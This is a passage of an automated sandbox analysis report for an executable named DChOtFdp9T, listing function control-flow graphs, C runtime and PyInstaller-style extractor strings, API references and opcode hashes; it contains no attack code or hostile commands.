                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                                            • Opcode ID: e105f9a5308570b1920b5885f7f78e0c7fe7403fb772c3fbd1fdeeb615f7f833
                                                                                                                                                                                                                            • Instruction ID: 9ccd91559210efa3a427553eb2847510f54a8642867b88858184a780e28a8a21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e105f9a5308570b1920b5885f7f78e0c7fe7403fb772c3fbd1fdeeb615f7f833
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D1F326E1821246EB21DF27D6601B96BA1FF84B8CF606035EA4DC7A87DFBCE441D340
                                                                                                                                                                                                                            Function 00007FF6029B59CC Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 590 7ff6029b59cc-7ff6029b5a3f call 7ff6029b5700 593 7ff6029b5a41-7ff6029b5a4a call 7ff6029a4124 590->593 594 7ff6029b5a59-7ff6029b5a63 call 7ff6029a7398 590->594 599 7ff6029b5a4d-7ff6029b5a54 call 7ff6029a4144 593->599 600 7ff6029b5a7e-7ff6029b5ae7 CreateFileW 594->600 601 7ff6029b5a65-7ff6029b5a7c call 7ff6029a4124 call 7ff6029a4144 594->601 614 7ff6029b5d9a-7ff6029b5dba 599->614 602 7ff6029b5b64-7ff6029b5b6f GetFileType 600->602 603 7ff6029b5ae9-7ff6029b5aef 600->603 601->599 609 7ff6029b5b71-7ff6029b5bac GetLastError call 7ff6029a40b8 CloseHandle 602->609 610 7ff6029b5bc2-7ff6029b5bc9 602->610 606 7ff6029b5b31-7ff6029b5b5f GetLastError call 7ff6029a40b8 603->606 607 7ff6029b5af1-7ff6029b5af5 603->607 606->599 607->606 612 7ff6029b5af7-7ff6029b5b2f CreateFileW 607->612 609->599 625 7ff6029b5bb2-7ff6029b5bbd call 7ff6029a4144 609->625 617 7ff6029b5bd1-7ff6029b5bd4 610->617 618 7ff6029b5bcb-7ff6029b5bcf 610->618 612->602 612->606 619 7ff6029b5bda-7ff6029b5c2f call 7ff6029a72b0 617->619 620 7ff6029b5bd6 617->620 618->619 628 7ff6029b5c31-7ff6029b5c3d call 7ff6029b5908 619->628 629 7ff6029b5c4e-7ff6029b5c7f call 7ff6029b5480 619->629 620->619 625->599 628->629 635 7ff6029b5c3f 628->635 636 7ff6029b5c81-7ff6029b5c83 629->636 637 7ff6029b5c85-7ff6029b5cc7 629->637 638 7ff6029b5c41-7ff6029b5c49 call 7ff6029a9940 635->638 636->638 639 7ff6029b5ce9-7ff6029b5cf4 637->639 640 7ff6029b5cc9-7ff6029b5ccd 637->640 638->614 642 7ff6029b5d98 639->642 643 7ff6029b5cfa-7ff6029b5cfe 639->643 640->639 641 7ff6029b5ccf-7ff6029b5ce4 640->641 641->639 642->614 643->642 645 7ff6029b5d04-7ff6029b5d49 CloseHandle CreateFileW 643->645 647 7ff6029b5d7e-7ff6029b5d93 645->647 648 7ff6029b5d4b-7ff6029b5d79 GetLastError call 7ff6029a40b8 call 7ff6029a74d8 645->648 647->642 648->647
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                                                                                            • Opcode ID: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction ID: b1ed138aefb6c3d9f2fc5af3cc7eabdc426ba25096205da525745fdffaa3e594
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb19b9bc7d9a7af770bbfb887b0b9fb968e3759c068f8a030e5a107204cb42c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBC1E032B28A4186EB11CFA6C5806AC3B61FB49B9CF611239DE1E973D6CF78D455C340
                                                                                                                                                                                                                            Function 00007FF6029B4CFC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 895 7ff6029b4cfc-7ff6029b4d31 call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 902 7ff6029b4e6f-7ff6029b4edd call 7ff6029a9780 call 7ff6029b0304 895->902 903 7ff6029b4d37-7ff6029b4d42 call 7ff6029b4418 895->903 914 7ff6029b4edf-7ff6029b4ee6 902->914 915 7ff6029b4eeb-7ff6029b4eee 902->915 903->902 908 7ff6029b4d48-7ff6029b4d53 call 7ff6029b4448 903->908 908->902 916 7ff6029b4d59-7ff6029b4d7c call 7ff6029a97c8 GetTimeZoneInformation 908->916 917 7ff6029b4f7b-7ff6029b4f7e 914->917 918 7ff6029b4ef0 915->918 919 7ff6029b4f25-7ff6029b4f38 call 7ff6029ac47c 915->919 925 7ff6029b4e44-7ff6029b4e6e call 7ff6029b4400 call 7ff6029b43f0 call 7ff6029b43f8 916->925 926 7ff6029b4d82-7ff6029b4da3 916->926 923 7ff6029b4f84-7ff6029b4f8c call 7ff6029b4a80 917->923 924 7ff6029b4ef3 917->924 918->924 933 7ff6029b4f43-7ff6029b4f5e call 7ff6029b0304 919->933 934 7ff6029b4f3a 919->934 929 7ff6029b4ef8-7ff6029b4f24 call 7ff6029a97c8 call 7ff60299b5c0 923->929 924->929 930 7ff6029b4ef3 call 7ff6029b4cfc 924->930 931 7ff6029b4dae-7ff6029b4db5 926->931 932 7ff6029b4da5-7ff6029b4dab 926->932 930->929 938 7ff6029b4dc9 931->938 939 7ff6029b4db7-7ff6029b4dbf 931->939 932->931 954 7ff6029b4f60-7ff6029b4f63 933->954 955 7ff6029b4f65-7ff6029b4f77 call 7ff6029a97c8 933->955 940 7ff6029b4f3c-7ff6029b4f41 call 7ff6029a97c8 934->940 949 7ff6029b4dcb-7ff6029b4e3f call 7ff6029b9530 * 4 call 7ff6029b18dc call 7ff6029b4f94 * 2 938->949 939->938 944 7ff6029b4dc1-7ff6029b4dc7 939->944 940->918 944->949 949->925 954->940 955->917
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4448: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B445C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: HeapFree.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                                            • Opcode ID: 303ac4e173d60c1653361034bfd680bd54c6db46ca9fd4eee2ed4abd6d663136
                                                                                                                                                                                                                            • Instruction ID: 1a3fba4cc495798e34acbb1d96239d576753923b1c089756c9e9a044fd92d29a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 303ac4e173d60c1653361034bfd680bd54c6db46ca9fd4eee2ed4abd6d663136
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD51A132A1864286E711DF27EA911B97B60FF8878CF606135EA4DC7697DFBCE4019740
                                                                                                                                                                                                                            Function 00007FF602998300 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                            • Opcode ID: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction ID: 0eec0533ce7a8f831826c8006c1060744d8332ddbf30b9b71040a25de4d18897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2b2b821024264583e45c17847e4aeb3761903e45f482e3a199f61f7deda80f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BF0C862A1C7418BF7A08B69B48A76A7790FF8473CF140339DA6D426D5DF7CD059CA00
                                                                                                                                                                                                                            Function 00007FFE0073A960 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 174 7ffe0073a960-7ffe0073a96b 175 7ffe0073a979 174->175 176 7ffe0073a96d-7ffe0073ad5f 174->176 178 7ffe0073a979 call 7ffe0075ecc4 175->178 180 7ffe0073afc0-7ffe0073afc2 176->180 181 7ffe0073ad65-7ffe0073ad87 GetLastError 176->181 179 7ffe0073a97e 178->179 179->176 182 7ffe0073b05e-7ffe0073b065 call 7ffe00735b94 180->182 183 7ffe0073afc8-7ffe0073afcb 180->183 184 7ffe0073ad89-7ffe0073adac call 7ffe00743fa0 181->184 185 7ffe0073adcc-7ffe0073ade9 call 7ffe0073e160 181->185 192 7ffe0073afad-7ffe0073afbf call 7ffe0076a830 182->192 186 7ffe0073b028-7ffe0073b02f call 7ffe00769684 183->186 187 7ffe0073afcd-7ffe0073afd0 183->187 201 7ffe0073adb2-7ffe0073adc6 184->201 202 7ffe0076f3c8-7ffe0076f3d1 TlsGetValue 184->202 199 7ffe0073adef-7ffe0073ae1a call 7ffe00743fa0 185->199 200 7ffe0076f3d7-7ffe0076f3de call 7ffe0073a890 185->200 186->192 209 7ffe0073b035 call 7ffe00769f20 186->209 191 7ffe0073afd2-7ffe0073afdb 187->191 187->192 197 7ffe0073b021-7ffe0073b026 191->197 198 7ffe0073afdd-7ffe0073b002 call 7ffe00743fa0 191->198 197->192 216 7ffe0076f392-7ffe0076f39a TlsGetValue 198->216 217 7ffe0073b008-7ffe0073b01b 198->217 218 7ffe0073ae20-7ffe0073ae33 199->218 219 7ffe0076f3e0-7ffe0076f3ec TlsSetValue 199->219 220 7ffe0076f3fa-7ffe0076f402 SetLastError 200->220 201->185 223 7ffe0073af2e-7ffe0073af62 GetLastError call 7ffe00743fa0 201->223 202->200 215 7ffe0073b03a-7ffe0073b041 call 7ffe00735ac8 209->215 224 7ffe0073b046-7ffe0073b048 215->224 228 7ffe0076f3a0-7ffe0076f3b6 call 7ffe00734fd8 call 7ffe0073a720 216->228 217->197 217->228 227 7ffe0076f3f2-7ffe0076f3f5 call 7ffe0073a890 218->227 242 7ffe0073ae39-7ffe0073ae8a 218->242 219->227 229 7ffe0076f408-7ffe0076f411 TlsGetValue 220->229 223->229 241 7ffe0073af68-7ffe0073af94 SetLastError * 2 223->241 231 7ffe0073b04e-7ffe0073b059 224->231 232 7ffe0076f3bb-7ffe0076f3c3 call 7ffe007696c4 224->232 227->220 228->197 231->192 232->192 252 7ffe0073af96 241->252 253 7ffe0073af9b-7ffe0073afa8 241->253 244 7ffe0073ae90-7ffe0073af13 call 7ffe0073db20 call 7ffe0073ddb0 242->244 254 7ffe0073af19-7ffe0073af28 244->254 252->253 253->192 254->220 254->223
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877342060.00007FFE00731000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFE00730000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877321758.00007FFE00730000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877476367.00007FFE007DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877524588.00007FFE00814000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877547774.00007FFE00817000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe00730000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                            • String ID: FlsFree$FlsGetValue$FlsSetValue
                                                                                                                                                                                                                            • API String ID: 1452528299-2999854541
                                                                                                                                                                                                                            • Opcode ID: c174eb66c9072d115f7b4b635c95bafa6c749e74807dc21d99819295e1953926
                                                                                                                                                                                                                            • Instruction ID: b7f6d351354218459d9df42a2795fcb0e2d7e39d146dac0f9d07e46f429efdbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c174eb66c9072d115f7b4b635c95bafa6c749e74807dc21d99819295e1953926
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA16B61A0AA039AFB05AB61A4412FC23A5FF48744F5C4036DB8E177BDEE3CE519C351
                                                                                                                                                                                                                            Function 00007FF6029918F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 255 7ff6029918f0-7ff60299192b call 7ff602993f50 258 7ff602991bc1-7ff602991be5 call 7ff60299b5c0 255->258 259 7ff602991931-7ff602991971 call 7ff6029975f0 255->259 264 7ff602991bae-7ff602991bb1 call 7ff60299f0bc 259->264 265 7ff602991977-7ff602991987 call 7ff60299f744 259->265 269 7ff602991bb6-7ff602991bbe 264->269 270 7ff6029919a1-7ff6029919bd call 7ff60299f40c 265->270 271 7ff602991989-7ff60299199c call 7ff602992760 265->271 269->258 276 7ff6029919bf-7ff6029919d2 call 7ff602992760 270->276 277 7ff6029919d7-7ff6029919ec call 7ff6029a3ea4 270->277 271->264 276->264 282 7ff6029919ee-7ff602991a01 call 7ff602992760 277->282 283 7ff602991a06-7ff602991a90 call 7ff602991bf0 * 2 call 7ff60299f744 call 7ff6029a3ec0 277->283 282->264 293 7ff602991a95-7ff602991a9f 283->293 294 7ff602991aa1-7ff602991ab4 call 7ff602992760 293->294 295 7ff602991ab9-7ff602991ad2 call 7ff60299f40c 293->295 294->264 300 7ff602991ad4-7ff602991ae7 call 7ff602992760 295->300 301 7ff602991aec-7ff602991b08 call 7ff60299f180 295->301 300->264 306 7ff602991b0a-7ff602991b16 call 7ff6029925f0 301->306 307 7ff602991b1b-7ff602991b29 301->307 306->264 307->264 309 7ff602991b2f-7ff602991b3e 307->309 311 7ff602991b40-7ff602991b46 309->311 312 7ff602991b60-7ff602991b6f 311->312 313 7ff602991b48-7ff602991b55 311->313 312->312 314 7ff602991b71-7ff602991b7a 312->314 313->314 315 7ff602991b8f 314->315 316 7ff602991b7c-7ff602991b7f 314->316 318 7ff602991b91-7ff602991bac 315->318 316->315 317 7ff602991b81-7ff602991b84 316->317 317->315 319 7ff602991b86-7ff602991b89 317->319 318->264 318->311 319->315 320 7ff602991b8b-7ff602991b8d 319->320 320->318
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 677216364-3497178890
                                                                                                                                                                                                                            • Opcode ID: 659f7725383b0b3d1fa0be45847f9bdbfed0c6b552e3991f9b5d536e3965ae04
                                                                                                                                                                                                                            • Instruction ID: 3bc60567fb18ec63b79c1fed2e8987e1e06e0d8f5f617e6a06a0d30bec826ce8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 659f7725383b0b3d1fa0be45847f9bdbfed0c6b552e3991f9b5d536e3965ae04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0071E531E0868399EB20CB1ED5503B96B92FF4979CF644035E98DC7B8BEEACE5558700
                                                                                                                                                                                                                            Function 00007FF602991440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                            • Opcode ID: 79e942d3b1661456f434e3b34f7cfed1355c69275aca59f60f5bdc2d1369945d
                                                                                                                                                                                                                            • Instruction ID: 05d9939a604ca1e7857d80ceffd146b9703c76f20ee8ac666096bf33306acd8f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79e942d3b1661456f434e3b34f7cfed1355c69275aca59f60f5bdc2d1369945d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141B921B086434AFE219B1BA5401B96BA0FF047E8F744031DE5EC7A97EEBCE4518740
                                                                                                                                                                                                                            Function 00007FF6029911F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                            • Opcode ID: c4c37e2f5b2b4efdff45cbd533f2d5aabac8a97652c0ac89e36fb261535d4a6c
                                                                                                                                                                                                                            • Instruction ID: d611e12a62c6377948f8f3a41cbef4203d4d55f44b3c84ce1bee7197b8eff2f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c37e2f5b2b4efdff45cbd533f2d5aabac8a97652c0ac89e36fb261535d4a6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6451E422A0864389EB209B1BA5503BA6A91FF857A8F644135ED4DC7BD7EFBCE451C700
                                                                                                                                                                                                                            Function 00007FF6029AA8DC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 782 7ff6029aa8dc-7ff6029aa902 783 7ff6029aa904-7ff6029aa918 call 7ff6029a4124 call 7ff6029a4144 782->783 784 7ff6029aa91d-7ff6029aa921 782->784 798 7ff6029aad0e 783->798 785 7ff6029aacf7-7ff6029aad03 call 7ff6029a4124 call 7ff6029a4144 784->785 786 7ff6029aa927-7ff6029aa92e 784->786 805 7ff6029aad09 call 7ff6029a9760 785->805 786->785 788 7ff6029aa934-7ff6029aa962 786->788 788->785 791 7ff6029aa968-7ff6029aa96f 788->791 795 7ff6029aa971-7ff6029aa983 call 7ff6029a4124 call 7ff6029a4144 791->795 796 7ff6029aa988-7ff6029aa98b 791->796 795->805 801 7ff6029aa991-7ff6029aa997 796->801 802 7ff6029aacf3-7ff6029aacf5 796->802 803 7ff6029aad11-7ff6029aad28 798->803 801->802 806 7ff6029aa99d-7ff6029aa9a0 801->806 802->803 805->798 806->795 809 7ff6029aa9a2-7ff6029aa9c7 806->809 811 7ff6029aa9c9-7ff6029aa9cb 809->811 812 7ff6029aa9fa-7ff6029aaa01 809->812 815 7ff6029aa9f2-7ff6029aa9f8 811->815 816 7ff6029aa9cd-7ff6029aa9d4 811->816 813 7ff6029aaa03-7ff6029aaa2b call 7ff6029ac47c call 7ff6029a97c8 * 2 812->813 814 7ff6029aa9d6-7ff6029aa9ed call 7ff6029a4124 call 7ff6029a4144 call 7ff6029a9760 812->814 842 7ff6029aaa48-7ff6029aaa73 call 7ff6029ab104 813->842 843 7ff6029aaa2d-7ff6029aaa43 call 7ff6029a4144 call 7ff6029a4124 813->843 846 7ff6029aab80 814->846 818 7ff6029aaa78-7ff6029aaa8f 815->818 816->814 816->815 821 7ff6029aaa91-7ff6029aaa99 818->821 822 7ff6029aab0a-7ff6029aab14 call 7ff6029b269c 818->822 821->822 826 7ff6029aaa9b-7ff6029aaa9d 821->826 833 7ff6029aab9e 822->833 834 7ff6029aab1a-7ff6029aab2f 822->834 826->822 830 7ff6029aaa9f-7ff6029aaab5 826->830 830->822 835 7ff6029aaab7-7ff6029aaac3 830->835 837 7ff6029aaba3-7ff6029aabc3 ReadFile 833->837 834->833 839 7ff6029aab31-7ff6029aab43 GetConsoleMode 834->839 835->822 840 7ff6029aaac5-7ff6029aaac7 835->840 844 7ff6029aabc9-7ff6029aabd1 837->844 845 7ff6029aacbd-7ff6029aacc6 GetLastError 837->845 839->833 847 7ff6029aab45-7ff6029aab4d 839->847 840->822 848 7ff6029aaac9-7ff6029aaae1 840->848 842->818 843->846 